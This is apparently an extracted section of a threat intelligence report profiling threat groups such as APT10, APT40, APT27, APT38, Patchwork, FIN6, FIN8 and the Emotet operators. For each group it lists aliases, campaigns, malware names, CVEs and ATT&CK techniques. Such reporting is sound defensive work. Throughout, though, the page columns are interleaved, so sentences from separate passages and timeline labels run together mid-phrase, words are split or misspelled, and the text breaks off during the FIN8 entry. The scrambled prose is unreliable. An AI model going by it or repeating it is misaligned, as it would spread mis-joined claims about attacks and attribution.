MenuPass operation: APT10 expands law customers in the pharmaceutical, 2013
its operations technology, electronics, biomedical, and

In June 2016, FireEye reported that APT10 automotive sectors, among others. 2014
expanded their operations, first targeting
a Japanese University to orientate their APT10: Campaign against Japan,
activities on the 6 continents until 2017. North-Korea and South American 2015
personalities Jan-2016
In 2017, APT10 has compromised
A new APT10 campaign was detected and MenuPass
manufacturing companies in India, Japan 2016
Operation: APT10
blocked in 2018. The latter was aimed at expands its
and Northern Europe, but also mining operations
the Japanese media sector.
companies in South America and finally 2017
multiple IT service providers across the APT10 targets government agencies Nov-2017
world. FireEye believes these companies in the Philippines and Southeast Asia Cloud Hopper: a
targeted APT10
and industries are not all final targets but At the end of April, a new activity of the
2018 Jan-2018
campaign
sometimes only organizations that could APT10 group was detected. The sample
APT10: campaign
against Japan -
provide a foothold. analysed comes from the Philippines, it is North-Korea and
2019
South-America Apr-2019
Cloud Hopper: a targeted APT10 likely that other Southeast Asian countries personalities APT10 targets
government
campaign were targeted. agencies in the
2020 Philippines and
Between November 2017 and September Southeast Asia
2018, APT10 launched new campaigns

ChChes RedLeaves Certutil Net None
EvilGrab SNUGRIDE Cmd Ping
Misdat S-Type Quasarrat Psexec
Mis-Type UPPERCUT Impacket Powersploit
PoisonIvy . ZLib Mimikatz Pwdump

Targeted
Countries _
Eastern Asia
Eastern Europe
Middle East
South-eastern Asia
South America
Western Europe
China

T1193 - Spearphishing Attachment T1036 - Masquerading T1076 - Remote Desktop Protocol
T1199 - Trusted Relationship T1038 - DLL Search Order Hijacking T1105 - Remote File Copy
Execution T1064 - Scripting Collection
T1047 - W i n d o w s M a n a g e m e n t T1073 - DLL Side-Loading T1005 - Data from Local System
Instrumentation T1078 - Valid Accounts T1039 - Data from Network Shared Drive
T1053 - Scheduled Task T1093 - Process Hollowing T1056 - Input Capture
T1059 - Command-Line Interface T1107 - File Deletion T1074 - Data Staged
T1064 - Scripting T1140 - Deobfuscate/Decode Files or
Information Command and Control
T1086 - PowerShell
T1090 - Connection Proxy
T1204 - User Execution Credential Access
Persistence T1003 - Credential Dumping
T1056 - Input Capture Exfiltration
T1038 - DLL Search Order Hijacking
T1002 - Data Compressed
T1053 - Scheduled Task Discovery
T1022 - Data Encrypted
T1078 - Valid Accounts T1016 - System Network Configuration
Privilege Escalation Discovery
T1046 - Network Service Scanning
Discovery
39
APT40 Cyber Criminal Government Agencies & Objectives _
ATK29 I nternational Espionage
71 Cyber Terrorist
LEVIATHAN Organizations
TEMP.PERISCOPE Hacktivist Naval
TEMP.JUMPER State Sponsored
Unknown
Language
Unknown
DESCRIPTION
The TEMP.Periscope or Leviathan group, conclusions that link the group to these two group whose campaigns obey the Chinese
gathered with the TEMP.Jumper group different campaigns and that establish the needs for technological catch-up and
within the ATK29 is a state-owned group Chinese origin of the latter. FireEye links Beijing's diplomatic ambitions. The group
of Chinese origin. Known for these attacks the two groups TEMP.Periscope and TEMP. is always very active and is composed of
on foreign maritime systems to extract data Jumper definitively in a report published competent people. Its arsenal is composed
necessary for the development of Chinese in March 2019. Since March 2019, there of many tools, which are regularly changed.
navy skills, as well as for its geostrategic has been a paradigm shift and a change It is quite reactive and has, in the past,
use in the context of the “New Silk Roads” in the target group. Thus, while the group used security vulnerabilities only a few
project. This group also campaigned had mainly targeted maritime companies days after their publication. Many of the
against the Cambodian government in in order to catch up with the Chinese tools used by this group are also used by
the general elections of 29 June 2018. Navy, it is increasingly targeting political other Chinese state attackers, suggesting
The infrastructure used in this attack organizations in Southeast Asia. The purpose exchanges of skills and tools between
shares many similarities with that used in of these Espionage actions is to support different sections. In addition, the group
campaigns against the maritime domain. the Chinese Silk Roads project on freight shared its infrastructure with another group
These similarities allow us to reinforce the transport infrastructure projects. ATK29 is a of Chinese attackers, Hellsing.
CAMPAIGNS
Jan-2014
NanHaiShu Campaign Temp.Periscope Targets Cambodia 2014
Leviathan
Campaign
In December 2014, the Hague Tribunal, The group's activities increased in the
seized of a dispute between China and summer of 2017, and it came back to the
the Philippines over the South China Sea, forefront with new tools. It systematically
rendered its verdict. During these events, the targets naval opponents, particularly in the
activity of NanHaiShu malware was used United States. Another report published in
2015
by China to obtain strategic information July 2018 shows a return to the first targets
Mar-2015
about the dispute. of Attacker 29, the political organizations NanHaiShu
Thus, among these targets are the Philippine of countries in the South China Sea. Thus, Campaign
Department of Justice, APEC, as well as the group is illustrated by the targeting

the firm responsible for representing the of Cambodian elections, as well as by
Philippines. the compromise of government entities
2016
responsible for these elections. Some of
Leviathan Campaign the themes addressed in some versions of
In October 2017, the company Proofpoint one of the group's malware, AIRBREAK,
published a report on an attacker, named suggest a more extensive targeting of
Leviathan. This attacker, who is said to have several political organizations located in
been active since at least 2014, targets Southeast Asia (a significant targeting of
maritime industries, naval contractors Cambodia, most of them from Cambodian 2018
working in defence as well as research newspapers, such as the Khmer Times, the
institutions in this field. Geographically, Phnom Penh Post or the Cambodia Daily).
Jul-2018
its attacks focus on the United States and
Temp.Periscope
Western Europe, as well as the South Targets Cambodia
China Sea.

AIRBREAK erusbi
D OMEFRY
H Cobalt Strike CVE-2017-8759
B LACKCOFFEE viltech
E URKYTOP
M LunchMoney CVE-2017-11882
C hina Chopper h0st RAT
g anHaiShu
N CVE-2017-0199
D adbod rillmark
G rz
O

Targeted
Countries _
Cambodia
Philippines
Southeast Asia
United States
Western Europe
China
Initial Access T1010 - Application Window Discovery

T1192 - Spearphishing Link Privilege Escalation T1083 - File and Directory Discovery
T1193 - Spearphishing Attachment T1078 - Valid Accounts Lateral Movement
T1078 - Valid Accounts T1100 - Web Shell T1105 - Remote File Copy
Execution Defense Evasion Collection
T1047 - Windows Management T1197 - BITS Jobs T1074 - Data Staged
Instrumentation T1078 - Valid Accounts T1119 - Automated Collection
T1168 - Local Job Scheduling T1102 - Web Service Command and Control
T1059 - Command-Line Interface T1009 - Binary Padding
T1203 - Exploitation for Client Execution T1132 - Data Encoding
T1112 - Modify Registry
T1117 - Regsvr32 T1105 - Remote File Copy
T1117 - Regsvr32
T1086 - PowerShell T1102 - Web Service
T1140 - Deobfuscate/Decode Files or
T1064 - Scripting T1043 - Commonly Used Port
Information
T1204 - User Execution T1094 - Custom Command and Control
T1064 - Scripting
Protocol
Persistence T1027 - Obfuscated Files or Information
T1116 - Code Signing Exfiltration
T1197 - BITS Jobs
T1078 - Valid Accounts Credential Access T1022 - Data Encrypted
T1168 - Local Job Scheduling T1048 - E xfiltration Over Alternative
T1003 - Credential Dumping Protocol
T1098 - Account Manipulation T1098 - Account Manipulation
Discovery
T1100 - Web Shell
T1060 - Registry Run Keys / Startup Folder T1057 - Process Discovery
41
ANIMAL FARM Cyber Criminal I nternational & Objectives _
ATK8 Organizations Espionage
71 Cyber Terrorist
SNOWGLOBE M
ilitary
Hacktivist M
edia
State Sponsored
Unknown
Language
Unknown
DESCRIPTION
ATK8 (or Animal Farm) is a group of seem to be financially motivated. Another uses have been in order to target various
French origins known for its high-quality more precise indication makes it possible organizations, notably in Syria, Iran and
malware. The group is active since at least to link the group to France. For good Malaysia. More broadly, the group deploys
2009, and some of its malware have been reason, the name “Barbar” given to the its campaigns on a global scale with some
associated with samples from as far as group's spyware echoes a strictly French twenty countries concerned.
2007. The group has been discovered fictional character. Also, the backdoor called The group mostly develops and use espionage
in March 2014 after the publication of “Tafacalou” has a name whose meaning tools, and the way the malware are deployed
a series of slides from Edward Snowden. in Occitan French regional language is to their targets is mostly unknown, though
This group is probably supported by a translated as:" it's gonna get hot" some documents containing zero-day
state-nation, considering the fact that it While the group is not associated with exploits have been used.
uses advanced techniques but does not any campaign in particular, the tool it
CAMPAIGNS
Insufficient information

Babar None CVE-2014-0515
EvilBunny CVE-2011-4369
Casper
Dino
Tafacalou

Algeria Malaysia
Austria Morocco
China Netherlands
D
emocratic N
ew
Republic of Zealand
the Congo Russia
Europe Syria
Germany Sweden
Great Britain Turkey
Israel Ukraine
Iran U
nited
Iraq States
France
Initial Access Defense Evasion Collection

T1189 - Drive-by Compromise T1027 - Obfuscated Files or Information T1056 - Input Capture
Execution T1036 - Masquerading T1074 - Data Staged
T1053 - Scheduled Task T1055 - Process Injection T1115 - Clipboard Data
T1064 - Scripting T1064 - Scripting T1119 - Automated Collection
T1203 - Exploitation for Client Execution T1093 - Process Hollowing T1123 - Audio Capture
T1112 - Modify Registry T1125 - Video Capture
Persistence T1497 - Virtualization/Sandbox Evasion Command and Control
T1050 - New Service
Credential Access T1001 - Data Obfuscation
T1060 - Registry Run Keys / Startup Folder T1056 - Input Capture T1008 - Fallback Channels
T1179 - Hooking T1179 - Hooking T1043 - Commonly Used Port
Discovery T1071 - Standard Application Layer
Privilege Escalation Protocol
T1050 - New Service T1010 - Application Window Discovery
T1012 - Query Registry Exfiltration
T1057 - Process Discovery T1002 - Data Compressed
T1063 - Security Software Discovery T1020 - Automated Exfiltration
T1179 - Hooking
T1082 - System Information Discovery T1022 - Data Encrypted
T1497 - Virtualization/Sandbox Evasion T1041 - Exfiltration Over Command and
Control Channel
43
ATK15 Communication Espionage
71 BRONZE UNION Cyber Terrorist
EMISSARY PANDA Naval
Hacktivist
GROUP 35 Defence
HIPPOTEAM State Sponsored Government Agencies
IRON TIGER
LUCKYMOUSE Unknown Manufacturing
TEMP.HIPPO Language
Political Organizations
TG-3390 Unknown
Education
THREAT GROUP-3390
ZIPTOKEN
DESCRIPTION
ATK15 is a cyber espionage group active 2009) likely base in the People's Republic (SWC) and scan-and-exploit techniques
since at least 2009 (first spearphishing of China. The group has a preference to compromise target systems.
spotted by TrendMicro on November 25, for leveraging strategic web compromise
CAMPAIGNS
APT27 Spear Phishing mayor of Shanghai. Other topics outlined
25 November 2009 - 25 January 2011: the attackers' objective to target very 2009
spearphishing campaign on multiple important people (VIPs), engineers, and/

or public relations (PR) or communication Nov-2008
sectors (medias, political organizations,
APT27 spear
education, government, manufacturing, officers. In 2013, Iron Tiger's objectives 2010 phishing
technology, non-profit organizations and changed. After carrying out cyber-espionage Aug-2010
others). exploits, the attackers focused on defence Iron Tiger
and technology-related areas such as operation
APT27 Spear Phishing with corrupted aerospace, energy, intelligence, nuclear
2011
documents related to Taiwan engineering and telecommunications. The

23 April 2013: Spear-phishing campaign on attackers seem to be constantly monitoring
government entities with decoy documents the US government's high-tech contractors. 2012
related to Taiwan.
APT27 conducted a strategic web
New spear phishing campaign from compromise (SWC) Apr-2013
2013
APT27 2016: ATK15 conducted a strategic web APT27 spear
phishing with
9 May 2014: Spear-phishing campaign compromise (SWC) on the website of an corrupted
documents related
on government entities. international industry organization that to Taiwan
2014
affected aerospace, academic, media, May-2014
Spear-phishing ontelecommunication technology, government, and utilities New spear
of technology companies organizations around the world. During a Sep-2014
phishing campaign
from APT27
5 September - 12 October 2014: Spear- discrete period of activity, this SWC was used 2015 Spear phishing on
telecommunication
phishing on telecommunication of technology to specifically target Turkish government, and technology
companies. banking, and academic networks. companies
Jan-2016
Iron Tiger operation Operation PZChao 2016 APT27 conducted
a strategic web
APT27 first attacked targets in the education 2017: Operation PZChao, ATK15 infect compromise (SWC)
industry in China, political dissidents targets with Bitcoin miners, password

in Hong Kong, government agencies Jan-2017
stealer and variants of Gh0st RAT. 2017
Operation PZChao
in the Philippines and political targets Oct-2017
in Tibet until 2010. They used “Han APT27 targets a national data center APT27 targets
Zheng stays at the Regent Pan-Housing in the Central Asia a national data
center in the
2018
demonstration organized in advance” as Autumn 2017 - March 2018: campaign Central Asia
a decoy to attract politicians who would targeting a national data centre in the
join a demonstration against the former Central Asia.

Aspxspy Gsecdump None
Httpbrowser Windows credential editor
Owaauth

Targeted
Countries _
Spain Central Asia
U
nited China
States Hong Kong
U
nited Philippines
Kingdom Tibet
Turkey
China

T1078 - Valid Accounts T1073 - DLL Side-Loading T1028 - Windows Remote Management
T1133 - External Remote Services T1078 - Valid Accounts T1105 - Remote File Copy
Execution T1089 - Disabling Security Tools Collection
T1028 - Windows Remote Management T1107 - File Deletion T1005 - Data from Local System
T1053 - Scheduled Task T1108 - Redundant Access T1056 - Input Capture
T1059 - Command-Line Interface T1126 - N etwork Share Connection T1074 - Data Staged
Removal
T1086 - PowerShell T1119 - Automated Collection
Credential Access
Persistence Command and Control
T1003 - Credential Dumping
T1053 - Scheduled Task T1043 - Commonly Used Port
T1056 - Input Capture
T1078 - Valid Accounts T1105 - Remote File Copy
T1108 - Redundant Access Discovery
Exfiltration
T1133 - External Remote Services T1016 - System Network Configuration
Privilege Escalation Discovery
T1053 - Scheduled Task T1030 - Data Transfer Size Limits
T1049 - S ystem Network Connections
Discovery
45
ATK104 Cyber Criminal Bank & Objectives _
Mummy Spider Financial Gain
70 Cyber Terrorist
TA542
Hacktivist
State Sponsored
Unknown
Language
Unknown
DESCRIPTION
ATK104 is a cybercriminal group responsible Emotet was originally sold on illegal of competent personnel, and Emotet is
for the malware known as Emotet (also markets, it became integrally private in regularly considered as one of the most
known as Geodo). This malware is the 2015, and is therefore operated solely threatening malware for businesses.
only one maintained by the group. While by the group. The group is composed
CAMPAIGNS
Emotet long-running campaigns party malware, especially the Dridex and 2014
Emotet, that was first seen around May Quakbot banking trojans.
2014, was originally designed as a modular Emotet features an email collection and
banking trojan. Its shared code with templating engine, which allows it to send
another banking trojan, Feodo. The group emails on the behalf of its victims in order
did however add features and improve to spread further.
already existing code. Since 2016, the tool mainly acts as a
In its first campaigns, Emotet was bundled loader, that deploys another malware.
with a banking module targeting Germany In 2018 for example, the group mainly May-2014
and Austria. deployed TrickBot to its victims, which in Emotet long-
running campaigns
The second version of Emotet, discovered turn has been seen distributing ransomwares
in fall 2014 made use of the Automatic such as Ryuk.
Transfer System, had a spamming module, Emotet uses a C&C infrastructure composed
a DDoS module and was able to steal of Tier 1 C&C and Tier 2 C&C, the first
data from address books. ones acting as proxies to the second ones.
A third version, that appeared in January This makes its architecture reliable, and
2015 was stealthier, and included a hard to take down. In June 2019, Emotet
banking module for Switzerland. C&C servers became unavailable, another
period of inactivity from ATK104, possibly
The group is known for being extremely
for infrastructure upgrade. The servers
active for few months before stopping the
came back online on August, the 22nd
spread of the malware for long periods.
2019, using the same binaries that before. 2015
Indeed, after a 10-month break, the group
came back in December 2016.
In this fourth iteration of Emotet, the group
made use of the RIG exploit kit for ensuring
its spread. The group used third-party tools
integrated into modules for this campaign,
which allowed the group to distribute third

Emotet None None

Targeted
Countries _
Austria
Germany
Switzerland
Unknown

T1192 - Spearphishing Link T1050 - New Service T1077 - Windows Admin Shares
T1193 - Spearphishing Attachment T1053 - Scheduled Task T1210 - Exploitation of Remote Services
T1078 - Valid Accounts T1078 - Valid Accounts Collection
Execution T1055 - Process Injection
T1047 - W i n d o w s M a n a g e m e n t Defense Evasion
Command and Control
Instrumentation T1078 - Valid Accounts
T1065 - Uncommonly Used Port
T1053 - Scheduled Task T1045 - Software Packing
T1059 - Command-Line Interface T1055 - Process Injection
T1043 - Commonly Used Port
T1203 - Exploitation for Client Execution T1064 - Scripting
T1094 - Custom Command and Control
T1086 - PowerShell T1027 - Obfuscated Files or Information
Protocol
T1204 - User Execution Exfiltration
Persistence T1110 - Brute Force
T1041 - Exfiltration Over Command and
T1050 - New Service T1081 - Credentials in Files Control Channel
T1053 - Scheduled Task T1040 - Network Sniffing
Impact
T1078 - Valid Accounts Discovery
T1023 - Shortcut Modification T1498 - Network Denial of Service
T1060 - Registry Run Keys / Startup Folder T1040 - Network Sniffing
47
APT-C-35 Cyber Criminal Aviation & Objectives _
ATK11 Embassies Espionage
69 Cyber Terrorist Energy
CHINASTRATS T
heft of sensitive
DROPPING ELEPHANT Hacktivist Financial Services
documents
Government Agencies
MONSOON State Sponsored Military
PATCHWORK N
on-governmental
Unknown
QUILTED TIGER organizations Language
SARIT Political Organizations English
SECTORE02 Public sector
Software
DESCRIPTION
Patchwork is a cyber espionage group goal seemed to be the surveillance of Multiple articles showed similarities between
active since at least 2010. One of its targets of national security interests for Patchwork behaviours and other groups':
specificity is the use of code copy-pasted India such as Pakistan or the Nagaland Confucius, Bahamut, Donot Team or
from multiple online forums combined movement. This group was involved in the BITTER APT, but there is no definitive
with high quality social engineering. It MONSOON campaign targeting multiple conclusion as to whether these groups
started by the Operation Hangover which Indian neighbour in various sectors. are the same or not.
CAMPAIGNS Jan-2010
2010
Operation
Hangover
2010 - Operation Hangover 2016 - 2017 - Spear-phishing
The operation Hangover started in 2010 campaign spreading BADNEWS
2011
and is the first operation which can be During these two year the Patchwork
attributed to the Patchwork APT. This group send multiple spear-phishing lure
campaign targeted Indian national security documents related to the Pakistan Army,
2012
interests but also Telenor, a Norwegian the Pakistan Atomic Energy Commission,
telecom company. as well as the Ministry of the Interior to
spread their BADNEWS backdoor.
March - May 2015 - Targeted 2013
Campaign Against Pakistan March - April 2018 - Spear-phishing

Government campaign against US think tanks
Volexity observed a spear-phishing campaign 2014
December 2015 - July 2016 -
Patchwork/MONSOON campaign against US think tanks using China-related
emails containing a link to download a Mar-2015
Patchwork/MONSOON is a targeted March-May 2015
variant of QuasarRAT. 2015
attack that has infected an estimated 2,500 Targeted campaign
against Pakistan Dec-2015
machines since it was first observed in Governement
Dec2015 - Jul2016
December 2015. This campaign targeted 2016 Patchwork/
different Chinese industries and government Jan-2016 MONSOON
campaigtn
agencies in Southeast Asia. 2016-2017
Spearphishing
2017 campaign
spreading
BADNEWS
Mar-2018
2018
Spearphishing
campaign against
US think tanks

BADNEWS QuasarRAT one CVE-2012-0158 CVE-2012-0422
Enfourks CVE-2017-0199 CVE-2017-0261
NDiskMonitor CVE-2012-4792 CVE-2017-11882
Taskhost Stealer CVE-2014-4114 CVE-2014-6332
TINYTYPHON CVE-2015-1641 CVE-2012-0158
Unkown Logger Public CVE-2017-8570 CVE-2014-4114
Wintel Stealer CVE-2017-12824 CVE-2009-0927
CVE-2014-6352

Targeted
Countries _
Bangladesh S
outh
Ceylin China Sea
China S
outh
Europe Korea
Israel Sri Lanka
Japan U
nited
S
outheast Kingdom
Asia U
nited
States
India

T1053 - Scheduled Task T1027 - Obfuscated Files or Information T1005 - Data from Local System
T1059 - Command-Line Interface T1064 - Scripting T1025 - Data from Removable Media
T1064 - Scripting T1066 - Indicator Removal from Tools T1039 - Data from Network Shared Drive
T1204 - User Execution T1073 - DLL Side-Loading T1056 - Input Capture
Persistence T1088 - Bypass User Account Control T1074 - Data Staged
T1053 - Scheduled Task T1107 - File Deletion T1113 - Screen Capture
T1158 - Hidden Files and Directories T1112 - Modify Registry T1114 - Email Collection
T1060 - Registry Run Keys / Startup Folder T1140 - Deobfuscate/Decode Files or T1119 - Automated Collection
Privilege Escalation T1158 - Hidden Files and Directories
T1053 - Scheduled Task T1024 - Custom Cryptographic Protocol
T1088 - Bypass User Account Control T1043 - Commonly Used Port
Credential Access T1071 - Standard Application Layer
T1056 - Input Capture Protocol
Discovery T1132 - Data Encoding
T1010 - Application Window Discovery Exfiltration
T1082 - System Information Discovery T1020 - Automated Exfiltration
T1083 - File and Directory Discovery T1041 - Exfiltration Over Command and
T1497 - Virtualization/Sandbox Evasion Control Channel
49
APT 38 Cyber Criminal Financial Services & Objectives _
ATK117 Media Financial Gain
69 Cyber Terrorist
BLUENOROFF
STARDUST CHOLLIMA Hacktivist
State Sponsored
Unknown
Language
Unknown
DESCRIPTION
The Unit 180 is the Noth Korean Unit in APT38 has a complete arsenal of malwares Strategic Context
charge of obtaining funds for the cyber and tools using defense evasion techniques The report from the UN Security Council
activity and for the Noth Korean regime. and false flags (use of some poorly translated said that North Korea is carrying out
This activity exists since at least 2014 Russian language in some malwares, re- “widespread and increasingly sophisticated”
and seems to have been increasing since useage of known malwares). It is possible cyberattacks and estimates that North
North Korea has been subject to severe that these malwares were developped Korea has generated $2 billon.
financial sanctions due to the development by another Unit (such as Unit 31), these
As a reminder, since 2009, relations
of new weapons. The economic pressure techniques could be used by other North
between the West and North Korea have
on Pyongyang leads the North Korean Korean groups. Despite this arsenal,
oscillated between tension and calm, while
government to find new ways to obtain APT38 uses Live-of-the-Land tools when
the latter is under embargo and stuck by
funding. it is possible. They put an effort into
the throat. To calm its enemy, the United
APT38 is a North Korean financially motivated discovert the targeted environment and
States provided food aid in exchange for
threat group who developed multiple ways maintain acces as long as possible while
a restraint effort. Despite this, aid is not
to steal money from the targeted attacks staying undeteced unitil they reach their
sufficient, and Korea has no choice but to
on banks and cryptocurrency exchanges goal. FireEye estimate that they stay in a
reiterate its pressure through missile fire or
to the spreading of ransomwares. This victim network approximately 155 days.
through dangerous barter. For example,
group seems to be learning about financial Since 2018 the group gone from stealthy for decades North Korea has traded arms
transaction in 2014 and developed a to noisy using the destructive KillDisk with countries such as Syria, Iran, Congo,
SWIFT malware in 2015. From 2014 to malware as a distraction tactic while they Burma, Eritrea and Yemen in exchange
2017 they mostly target organizations are targeting the SWIFT network to initiate for food. The cyber tool is suitable in this
from Southeast Asia and expand to South malicious transations. respect since it allows profits to be made
America and Africa in mid-2016. They We suspect the Unit 180 to be source with relative discretion.
also targeted Europe and North America of the WannaCry ransomware in 2017.
from October 2016 to October 2017.

DarkComet RATANKBAPOS Net CVE-2016-1019
DYEPACK RAWHIDE Sysmon CVE-2015-8651
HERMES REDSHAWL CVE-2016-4119
HOTWAX SCRUBBRUSH
KillDisk SHADYCAT
KEYLIME SLIMDOWN
JspSpy SMOOTHRIDE
MAPMAKER SORRYBRUTE
NACHOCHEESE WHITEOUT
NESTEGG WORMHOLE
QUICKCAFE WannaCry
QUICKRIDE

Targeted
Countries _
Bangladesh Poland
Brazil Russia
Chile Taiwan
Malaysia Turkey
Mexico United States
North Korea Uruguay
Philippines Vietnam
North Korea
CAMPAIGNS
February 2014 - Attack of the and more generally all versions prior 2014
Feb-2014
Southeast Asian bank to Windows 10 that had not performed Attack of the
APT38 targeted the Southeast Asian security updates, in particular that of March Southeast Asian
bank
bank using the malwares NESTEGG and 14, 2017 (security bulletin MS17-010).
KEYLIME which were specifically crafted This cyber-attack is considered to be the
to impact financial systems. During this biggest ransom piracy in the history of the
attack APT38 seemed to be still learning Internet, with the European Police Office
about various systems related to financial Europol describing it as "unprecedented".
transactions. Among the most important organisations
affected by this attack are the companies 2015
December 2015 - Attempted heist Vodafone, FedEx, Renault, Telefónica,
at TPBank the National Health Service, the Centre
The Vietnamese bank TPBank blocked $1.36 Hospitalier Universitaire of Liège, the
of SWIFT transfers in December 2015. Russian Ministry of the Interior and the
January 2016: Multiple international Deutsche Bahn.
bank heist O c t obe r 2 017 - Fa r E a s t e r n
February 2016 - Bangladesh bank International Bank heist Dec-2015
heist January 2018 - Attempted heist 2016
Attempted heist at
Jan-2016 TPBank
In February 2016, APT38 initiates thirty-five at Bancomext Multiple
fraudulent transactions worth $851m. While In January 2018, APT38 attempted to steal international bank Feb-2016
heist Bangladesh bank
most of them were blocked or recovered, $110m from the Mexican commercial heist
$81m were successfully transfered to the bank Bancomext. The operation failed
Philippines, laundered through casinos but APT38 used a wipper called KillDisk
and transfered to Hong Kong. to cover their tracks. Oct-2016
October 2016 - Watering hole attacks April 2018 - Attack on three Mexico
Watering hole
attacks on
on government and media sites banks government and
2017 media sites
May 2017 - WannaCry May 2018 - Heist at Banco de Chile

In May 2017, APT38 launched a massive In May 2018, APT38 successfully steal
global cyber-attack with WannaCry Malware, $10m from the Chile's largest bank,
May-2017
affecting more than 230,000 computers Banco de Chile. This attack is followed WannaCry
in more than 150 countries, mainly in by the compromising of 9000 Windows
India, the United States and Russia, computer and 500 Windows server by the
Oct-2017
using the obsolete Windows XP system destructive malware KillDisk. Far Eastern
International Bank
heist Jan-2018
2018
Attempted heist at
Bancomext
Apr-2018
Attack on three
Mexico banks May-2018
Heist at Banco de
Chile
2019
51
APT 38 Cyber Criminal Financial Services & Objectives _
ATK117 Media Financial Gain
69 Cyber Terrorist
BLUENOROFF
STARDUST CHOLLIMA Hacktivist
State Sponsored
Unknown
Language
Unknown

Targeted
Countries _
Bangladesh Poland
Brazil Russia
Chile Taiwan
Malaysia Turkey
Mexico United States
North Korea Uruguay
Philippines Vietnam
North Korea

T1078 - Valid Accounts T1027 - Obfuscated Files or Information T1076 - Remote Desktop Protocol
T1189 - Drive-by Compromise T1036 - Masquerading Collection
T1190 - Exploit Public-Facing Application T1045 - Software Packing T1056 - Input Capture
T1193 - Spearphishing Attachment T1055 - Process Injection T1123 - Audio Capture
Execution T1078 - Valid Accounts
T1099 - Timestomp Command and Control
T1204 - User Execution T1043 - Commonly Used Port
T1107 - File Deletion
Persistence T1112 - Modify Registry T1065 - Uncommonly Used Port
T1060 - Registry Run Keys / Startup Folder T1140 - Deobfuscate/Decode Files or T1071 - S tandard Application Layer
T1050 - New Service Information Protocol
T1078 - Valid Accounts T1079 - Multilayer Encryption
Credential Access T1090 - Connection Proxy
Privilege Escalation T1003 - Credential Dumping T1043 - Commonly Used Port
T1050 - New Service T1056 - Input Capture
T1055 - Process Injection Impact
Discovery T1485 - Data Destruction
T1046 - Network Service Scanning T1492 - Stored Data Manipulation
T1063 - Security Software Discovery
53
ATK 88 Cyber Criminal Energy & Objectives _
FIN6 Hospitality Organizational-gain
68
Cyber Terrorist
SKELETON SPIDER Retail
TAG-CR2 Hacktivist
State Sponsored
Unknown
Language
English, Russian
DESCRIPTION
FIN6 is a cybercrime group active since recent years, and subsequently found to companies that have many transactions.
at least 2015 and focuses mostly on the be sold on the dark web. Furthermore, in Therefore, most of their activity is against
financial sector. Their claim to fame is some cases, if they are unable to steal this victims in the US and Europe. Of note,
in attacking Point-of-Sales and stealing data, they move to target card-not-present since mid-2018, it was spotted that the
credit card data from them. Millions of (CNP) data. They usually use specifically group has started to deploy ransomware
cards were stolen using this method in POS malware, and their victims are from on non-Ecommerce networks.
CAMPAIGNS
2015 September 2018
FIN6 had aggressively targeted and The group was found to use the same 2015
compromised point-of-sale (POS) system, TTP as in the original campaign that was 2015
FIN6 had
resulting with stealing of millions of credit recognized in 2016, however this time aggressively
cards. In this case, most of the cards were it used WMIC to execute power shell targeted and
compromised
stolen using the GRABNEW malware, which commands and scrips automatically. The point-of-sale
2016
after lateral movement let to downloading victims in this case were point of sale Jun-2016
of POS malware called AbaddonPOS. systems in the USA and Europe. FIN6 were
able to deploy
Following the successful stealing, the cards
were posted on Dark Web marketplaces Since July 2018 - ongoing FrameworkPOS
to steal over 300
credit card records
that specialize in credit cards, which The group has started to deploy ransomwares from two victims
2017
continued for several months until the on non-ecommerce networks, and especially
victims’ networks were clean. Ryuk and LockerGoga ransomwares. At the
beginning they attacked an Internet-faced
June 2016 system, and then used stolen credentials
July-2018 Sep-2018
FIN6 were able to deploy FrameworkPOS to move laterally through the system. 2018 The group has The group was
to steal over 300 credit card records vvstarted to deploy found to use the
from two victims, namely a SMB based in End of 2018 ransomwares on same TTP as
non-ecommerce in the original
Honolulu Hawaii, and another based in The group send malicious documents with networks campaign that
was recognized
Chicago. This campaign is not widespread a link to malicious server that allowed the in 2016
is in their other campaigns. execution of PowerShell scripts to multiple 2019
End of 2018
high value ecommerce merchants which The group
send malicious
gave them access to their internal network. documents with
a link to malicious
server

Malwares Legitimate software
Custom tools Tools used by multiple adversaries PsExec
G RABNEW (NEVERQUEST, L ockerGoga - Used to encrypt the Windows Credential Editor
VAWTRAK) - Used to harvest account victim’s device PowerShell
detail F rameworkPOS (TRINITY) Query Express
G ratefulPOS - POS malware M ore_Eggs (Terra Loader) Adfind
deployed to steal payment information fl awedammyy
A baddonPOS - POS malware Exploited vulnerabilities
R yuk
deployed to steal payment VE-2010-4398
C
Publicly available tools VE-2011-2005
C
information.
obalt Strike
C VE-2013-3660
C
H ARDTACK - Downloader
etasploit
m
S HIPBREAD - Downloader
T RINITY - POS malware

Targeted
Countries _
Europe
United States
Unknown

T1078 - Valid Accounts T1036 - Masquerading T1074 - Data Staged
Execution T1055 - Process Injection T1119 - Automated Collection
T1035 - Service Execution T1064 - Scripting Command and Control
T1047 - W i n d o w s M a n a g e m e n t T1078 - Valid Accounts T1032 - Standard Cryptographic Protocol
Instrumentation T1102 - Web Service T1071 - S tandard Application Layer
T1053 - Scheduled Task Credential Access Protocol
T1064 - Scripting T1003 - Credential Dumping T1102 - Web Service
T1086 - PowerShell T1040 - Network Sniffing
Persistence Discovery Exfiltration
T1053 - Scheduled Task T1018 - Remote System Discovery T1002 - Data Compressed
T1060 - Registry Run Keys / Startup Folder T1040 - Network Sniffing T1022 - Data Encrypted
T1078 - Valid Accounts T1046 - Network Service Scanning T1048 - E xfiltration Over Alternative
Privilege Escalation T1069 - Permission Groups Discovery Protocol
T1053 - Scheduled Task T1087 - Account Discovery
T1055 - Process Injection Lateral Movement
T1068 - Exploitation for Privilege Escalation T1076 - Remote Desktop Protocol
55
ATK113 Cyber Criminal Entertainment & Objectives _
FIN8 Food and Agriculture Financial Gain
68
Cyber Terrorist
Healthcare
Hacktivist
Hospitality
State Sponsored Retail
Unknown
Language
Unknown
DESCRIPTION
FIN8 is a financially motivated group spearphishing campaigns using the
targeting the retail, hospitality and downloader PUNCHBUGGY and POS
entertainment industries. The actor had malware PUNCHTRACK.
previously conducted several tailored
CAMPAIGNS
ATK113 (FIN8)targets retail, restaurant ATK113 targets hotel-entertainment 2016 Mar-2016
and hospitality industries in North industry ATK113 (FIN8)

targets retail -
America During the period of March to May 2019, restaurant and
hospility industries
In March 2016, a financially motivated Morphisec Labs observed a new, highly in North America
threat actor launched several tailored spear sophisticated variant of the ShellTea/
phishing campaigns primarily targeting the PunchBuggy backdoor malware that 2017
retail, restaurant, and hospitality industries. attempted to infiltrate a number of machines

More than 100 organizations in North within the network of a customer in the Jun-2017
America felt victim to this campaign. hotel-entertainment industry. ATK113 targets
Retail Point-of-Sale
(PoS)
ATK113 targets Retail Point-Of-
Sale (PoS) 2018
ATK113 launched an advanced, targeted

